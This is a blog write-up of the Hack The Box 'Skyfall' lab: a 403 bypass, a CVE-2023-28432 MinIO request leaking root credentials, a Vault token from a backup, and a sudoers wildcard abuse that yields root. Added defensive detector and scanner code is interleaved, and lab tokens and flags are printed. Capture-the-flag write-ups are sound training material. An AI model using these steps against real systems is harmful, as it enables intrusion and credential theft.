Trtyr's Blog

Hack The Box - Skyfall

Word count: 2.6k | Reading time: 13 min
2024/02/11

Hack The Box lab, Season 4 Week 5: the Skyfall machine

Target IP: 10.10.11.254

Information gathering

┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sT --min-rate 10000 -p- 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:29 CST
Warning: 10.10.11.254 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).
Not shown: 58911 closed tcp ports (conn-refused), 6622 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 35.40 seconds

TCP ports 22 and 80 are open. Next, scan those ports for service details.

┌──(root㉿Desktop-Trtyr)-[~]
└─# nmap -sTCV -O -p22,80 10.10.11.254
Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:32 CST
Nmap scan report for 10.10.11.254
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds

Web penetration testing

Information gathering

Directory scan

dirsearch -u "http://10.10.11.254/" -i 200

Nothing found.

XSS test

Found a spot where XSS might be possible.

XSS fuzzing

python3 xsstrike.py -u "http://10.10.11.254/?name=12345&email=12345%40test.com&subject=12345&message=12345" --data name,subject,message

Failed.

Subdomain discovery

It recently occurred to me: in an internal network environment, why not just run nslookup on the IP and see which domain names resolve to it?

┌──(root㉿Desktop-Trtyr)-[~]
└─# nslookup 10.10.11.254
254.11.10.10.in-addr.arpa name = skyfall.htb.
254.11.10.10.in-addr.arpa name = demo.skyfall.htb.

Two domain names; bind them in the hosts file, then see what each one is.

Domain            Description
skyfall.htb       Home page
demo.skyfall.htb  An admin backend

Web backend

Login test

Arriving at the backend.

A guest account and password are provided; try logging in with them.

File upload test

It is an object storage site. Doesn't look promising, but let's try.

Failed; it could not connect.

403 bypass

Out of ideas; let's try a 403 bypass.

http://demo.skyfall.htb/metrics%0a

We're in.

A new domain name shows up:

http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

Add it to hosts and visit it.

What on earth is this???

CVE-2023-28432 vulnerability test

From its fingerprints this is a MinIO object store. Looking for public vulnerabilities turns up CVE-2023-28432; let's try it.

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: prd23-s3-backend.skyfall.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/awebp,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The response is an information disclosure:

"MinioEnv": {
"MINIO_ACCESS_KEY_FILE": "access_key",
"MINIO_BROWSER": "off",
"MINIO_CONFIG_ENV_FILE": "config.env",
"MINIO_KMS_SECRET_KEY_FILE": "kms_master_key",
"MINIO_PROMETHEUS_AUTH_TYPE": "public",
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0",
"MINIO_ROOT_PASSWORD_FILE": "secret_key",
"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww",
"MINIO_ROOT_USER_FILE": "access_key",
"MINIO_SECRET_KEY_FILE": "secret_key",
"MINIO_UPDATE": "off",
"MINIO_UPDATE_MINISIGN_PUBKEY": "RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"
}

From this we obtain

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"
"MINIO_UPDATE_MINISIGN_PUBKEY": "RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"

These are the bucket's user, password and key; with them we can download the bucket to the local machine.
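From the defender's side, both the `%0a` 403 bypass and the CVE-2023-28432 bootstrap-verify leak leave traces in the reverse proxy's access log. The following Python detector is added here and is not part of the original write-up; the nginx-format log lines, the restricted path list and the trusted peer set are constructed assumptions for the example.

```python
import re
from urllib.parse import unquote

# Constructed nginx "combined"-format lines for the demo (not taken from the target).
SAMPLE_LOG = """\
10.10.14.5 - - [11/Feb/2024:05:10:01 +0000] "GET /metrics HTTP/1.1" 403 153 "-" "Mozilla/5.0"
10.10.14.5 - - [11/Feb/2024:05:10:07 +0000] "GET /metrics%0a HTTP/1.1" 200 8820 "-" "Mozilla/5.0"
10.10.14.5 - - [11/Feb/2024:05:11:42 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1422 "-" "Mozilla/5.0"
10.10.11.254 - - [11/Feb/2024:05:12:00 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1422 "-" "MinIO (linux; amd64)"
10.10.14.5 - - [11/Feb/2024:05:12:30 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed for the example: paths the proxy is meant to deny, and cluster peers that may
# legitimately call the MinIO bootstrap endpoint.
RESTRICTED_PREFIXES = ("/metrics",)
TRUSTED_PEERS = {"10.10.11.254"}
BOOTSTRAP_VERIFY = "/minio/bootstrap/v1/verify"


def analyse(log_text, restricted=RESTRICTED_PREFIXES, peers=TRUSTED_PEERS):
    """Return (source_ip, reason) findings for the two access patterns seen in this box."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, method, raw_path, status = m.group("src", "method", "path", "status")
        decoded = unquote(raw_path.split("?", 1)[0])
        # An exact-match deny rule sees "/metrics\n" as a different path, but the
        # upstream still serves it: flag restricted prefixes reached via control chars.
        if any(decoded.startswith(p) for p in restricted) and any(c < " " for c in decoded):
            findings.append((src, f"control char in restricted path {raw_path!r} (status {status})"))
        # CVE-2023-28432: the bootstrap verify endpoint answered a host that is not a peer.
        if method == "POST" and decoded == BOOTSTRAP_VERIFY and status == "200" and src not in peers:
            findings.append((src, "bootstrap verify served to non-peer (CVE-2023-28432 pattern)"))
    return findings


if __name__ == "__main__":
    for src, reason in analyse(SAMPLE_LOG):
        print(src, reason)
```

Detection is a stopgap: the fix for the second pattern is upgrading MinIO past RELEASE.2023-03-20T20-16-18Z, and for the first it is denying restricted paths by prefix rather than by exact match.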

Bucket: from the cloud to local

Install the MinIO Admin Client

We need to install a MinIO Admin Client. My environment is Windows, so I downloaded the Windows build; if your environment differs, pick the matching download. Download link: MinIO | Code and downloads to create high performance object storage

There are two downloads, one for the server and one for the client; we only need the client.

The download gives you mc.exe. Create a minio folder; inside it create the application directory bin to hold mc.exe, the data directory data for the downloaded data files, and the log directory log for the logs. The directory structure is as follows:

- minio
  - bin
    - mc.exe
  - data
  - log

From the cloud to local

We first need to register a local alias for the bucket endpoint: name it as you like, point it at the cloud data to be downloaded, and supply the account and password.

./mc.exe alias set myminio http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Now we can list the contents of the bucket:

./mc.exe ls --recursive --versions myminio

There is a 1.2MiB askyy/home_backup.tar.gz; it is probably a backup file, so copy it to the local machine and inspect it.

./mc.exe cp --vid 3c498578-8dfe-43b7-b679-32a3fe42018f myminio/askyy/home_backup.tar.gz "C:\Users\Trtyr\Downloads\minio\data"

It contains a .ssh folder with a public key inside.

That gives us the ssh user askyy.

Public-key SSH login test

Try logging in over ssh.

It asks for an RSA key? Either there is something wrong with this ssh key, or ssh isn't how you log in at all. If the key is wrong there is nothing we can do, so we can only assume there is another way in.

Finding other ways to log in

For now all we can do is look at the bucket, so go through everything in it one by one.

The v1 backup we downloaded contains only some directory listings, a Finnish_Univ_students_2018.csv, a few .txt files, and the line "ssh LOGIN@remote.server.fi", whose purpose is unclear.

Let's look at the other versions of the backup.

./mc.exe cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz "C:\Users\Trtyr\Downloads\minio\data"

In .bashrc there is an environment variable definition:

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

A new domain name again; add it to hosts and visit it.

A quick search on its fingerprints shows this is Vault, an identity-based secrets and encryption management system.
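The backup in the bucket leaked a Vault token through `.bashrc`; a secret scan of the archive before upload would have caught it. The following in-memory tarball scanner is an added example, not from the write-up; the archive contents, the example token and the 20-character MinIO key pattern are constructed assumptions for the demo.

```python
import io
import re
import tarfile

# Patterns for the credential types this box leaked: Vault service tokens (hvs. prefix),
# MinIO root user/password assignments and SSH private keys. The 20-char MinIO
# pattern is an assumption based on the values seen above.
PATTERNS = {
    "vault_token": re.compile(r"\bhvs\.[A-Za-z0-9_-]{24,}"),
    "minio_root": re.compile(r"MINIO_ROOT_(?:USER|PASSWORD)\s*[=:]\s*[\"']?([A-Za-z0-9]{20})"),
    "ssh_private_key": re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC) PRIVATE KEY-----"),
}


def scan_tar(data, max_member_size=1 << 20):
    """Scan a gzip tarball held in memory; return [(member, pattern, redacted_secret)]."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile() or member.size > max_member_size:
                continue
            f = tar.extractfile(member)
            if f is None:
                continue
            text = f.read().decode("utf-8", errors="replace")
            for name, rx in PATTERNS.items():
                for m in rx.finditer(text):
                    secret = m.group(m.lastindex or 0)
                    hits.append((member.name, name, secret[:6] + "..."))  # never log the full value
    return hits


def build_sample_backup():
    """Constructed home_backup.tar.gz for the demo: a .bashrc with an example Vault token."""
    files = {
        "home/askyy/.bashrc": 'export VAULT_API_ADDR="http://vault.example.internal"\n'
                              'export VAULT_TOKEN="hvs.EXAMPLEexampleEXAMPLEexample0000"\n',
        "home/askyy/.ssh/authorized_keys": "ssh-ed25519 AAAAC3Nza... askyy@skyfall\n",
        "home/askyy/notes.txt": "ssh LOGIN@remote.server.fi\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            raw = content.encode()
            info = tarfile.TarInfo(path)
            info.size = len(raw)
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()
```

Run `scan_tar(build_sample_backup())` to see the single `.bashrc` hit; pointing `scan_tar` at a real backup's bytes works the same way.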

Vault login

Download Vault

wget http://releases.hashicorp.com/vault/1.15.5/vault_1.15.5_linux_amd64.zip
unzip vault_1.15.5_linux_amd64.zip

Add temporary environment variables

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"

Log in

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault login
Token (will be hidden):
WARNING! The VAULT_TOKEN environment variable is set! The value of this
variable will take precedence; if this is unwanted please unset VAULT_TOKEN or
update its value accordingly.

Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key Value
--- -----
token hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE
token_accessor rByv1coOBC9ITZpzqbDtTUm8
token_duration 435759h49m54s
token_renewable true
token_policies ["default" "developers"]
identity_policies []
policies ["default" "developers"]

Check the available login roles

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault token capabilities ssh/roles
list

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault list ssh/roles
Keys
----
admin_otp_key_role
dev_otp_key_role

Now we can attempt an ssh login.

SSH login

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@10.10.11.254
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 140c780c-092d-01cb-5fc5-5fe6af8d9ab4
(askyy@10.10.11.254) Password:

It prompts for a password here; the password is the OTP shown above, 140c780c-092d-01cb-5fc5-5fe6af8d9ab4.

Host penetration

user flag

askyy@skyfall:~$ ls
user.txt
askyy@skyfall:~$ cat user.txt
7555ee6e92f71aa2d74b02fc94f44f08

Privilege escalation

Check available privileges

askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml

So there are a couple of commands we can run here:

askyy@skyfall:~$ /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
-bash: /root/vault/vault-unseal: Permission denied
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false

There is a token, but debug mode has to be enabled before we can see it.

Enable debug mode

Create a debug log file:

touch debug.txt

Run it again:

askyy@skyfall:~$ touch debug.txt
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.txt
askyy@skyfall:~$

No effect... maybe a permissions problem?

askyy@skyfall:~$ ls -la
total 32
drwxr-x--- 4 askyy askyy 4096 Feb 11 05:40 .
drwxr-xr-x 3 root root 4096 Jan 19 21:33 ..
lrwxrwxrwx 1 askyy askyy 9 Nov 9 21:30 .bash_history -> /dev/null
-rw-r--r-- 1 askyy askyy 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 askyy askyy 3771 Nov 9 21:30 .bashrc
drwx------ 2 askyy askyy 4096 Oct 9 18:47 .cache
-rw-r--r-- 1 askyy askyy 807 Jan 6 2022 .profile
drwx------ 2 askyy askyy 4096 Jan 18 10:32 .ssh
-rw-rw-r-- 1 askyy askyy 0 Feb 11 05:40 debug.txt
-rw-r----- 1 root askyy 33 Feb 10 18:27 user.txt

Looks fine, doesn't it?

Then came half a day of searching, only to find that what I had created wasn't a log file at all. Facepalm.

rm debug.txt
touch debug.log
sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

Still wrong? It feels like the arguments are wrong.

askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v debug.log
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.log
2024/02/11 05:46:08 Initializing logger...
2024/02/11 05:46:08 Reading: /etc/vault-unseal.yaml
2024/02/11 05:46:08 Security Risk!
2024/02/11 05:46:08 Master token found in config: hvs.I0ewVsmaKU1SwVZAKR3T0mmG
2024/02/11 05:46:08 Found Vault node: http://prd23-vault-internal.skyfall.htb
2024/02/11 05:46:08 Check interval: 5s
2024/02/11 05:46:08 Max checks: 5
2024/02/11 05:46:08 Establishing connection to Vault...
2024/02/11 05:46:08 Successfully connected to Vault: http://prd23-vault-internal.skyfall.htb
2024/02/11 05:46:08 Checking seal status
2024/02/11 05:46:08 Vault sealed: false

This time it worked; we get the token: hvs.I0ewVsmaKU1SwVZAKR3T0mmG
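Why does `-d -v debug.log` pass the sudoers check? sudoers matches the argument list as one space-separated string, so the `[-vhd]*` pattern accepts any argument string whose first character is `-`, `v`, `h` or `d`, including a `-d` log path that the binary then writes as root. The Python below is an added illustration of that matching, not from the page; the exact-string rule list is an assumed tighter alternative.

```python
import fnmatch

# Argument pattern from the sudoers rule shown by `sudo -l` above.
RULE_ARGS = "-c /etc/vault-unseal.yaml [-vhd]*"

# Assumed tighter alternative: enumerate the exact argument strings that are allowed
# (no -d, so no operator-chosen log path can be written as root).
SAFE_RULES = ("-c /etc/vault-unseal.yaml", "-c /etc/vault-unseal.yaml -v")


def sudoers_args_match(pattern, args):
    """sudoers compares the joined argument string with fnmatch, so '*' also spans spaces."""
    return fnmatch.fnmatchcase(" ".join(args), pattern)


def safe_args_match(args, rules=SAFE_RULES):
    """Exact-string rules: no wildcard, so no extra arguments can be smuggled in."""
    return " ".join(args) in rules


def wildcard_tokens(pattern):
    """Audit helper: the argument tokens of a sudoers rule that contain glob wildcards."""
    return [tok for tok in pattern.split() if any(ch in tok for ch in "*?[")]


def demo():
    """For each argument list: (accepted by the wildcard rule, accepted by the exact rules)."""
    base = ["-c", "/etc/vault-unseal.yaml"]
    cases = {
        "verbose": base + ["-v"],
        "debug_to_file": base + ["-d", "-v", "debug.log"],       # what the write-up used
        "starts_with_d": base + ["drop", "anything", "here"],    # 'd' is in the character class
        "other_config": ["-c", "/etc/other.yaml", "-v"],
    }
    return {name: (sudoers_args_match(RULE_ARGS, a), safe_args_match(a)) for name, a in cases.items()}
```

`demo()` shows the wildcard rule accepting three of the four argument lists while the exact rules accept only the intended one.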

Create root access

Exit the current ssh session and set the environment variables again:

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

Request an OTP

┌──(root㉿Desktop-Trtyr)-[~/Tools]
└─# curl \
--header "X-Vault-Token: $VAULT_TOKEN" \
--request POST \
--data '{"ip":"10.10.11.254", "username":"root"}' \
$VAULT_ADDR/v1/ssh/creds/admin_otp_key_role
curl: (3) URL rejected: Malformed input to a URL function
-bash: http://prd23-vault-internal.skyfall.htb/v1/ssh/creds/admin_otp_key_role: 没有那个文件或目录

Huh? Let me redo it from the host machine.

That yields the key: 411c0829-1434-529c-17c9-79df5a407c85

Log in as root

We can ssh in directly:

ssh root@10.10.11.254

root flag

root@skyfall:~# ls
minio root.txt sky_storage vault
root@skyfall:~# cat root.txt
745d2ff27204b7ce5ef148d399713da3

Submit the flags

Success!
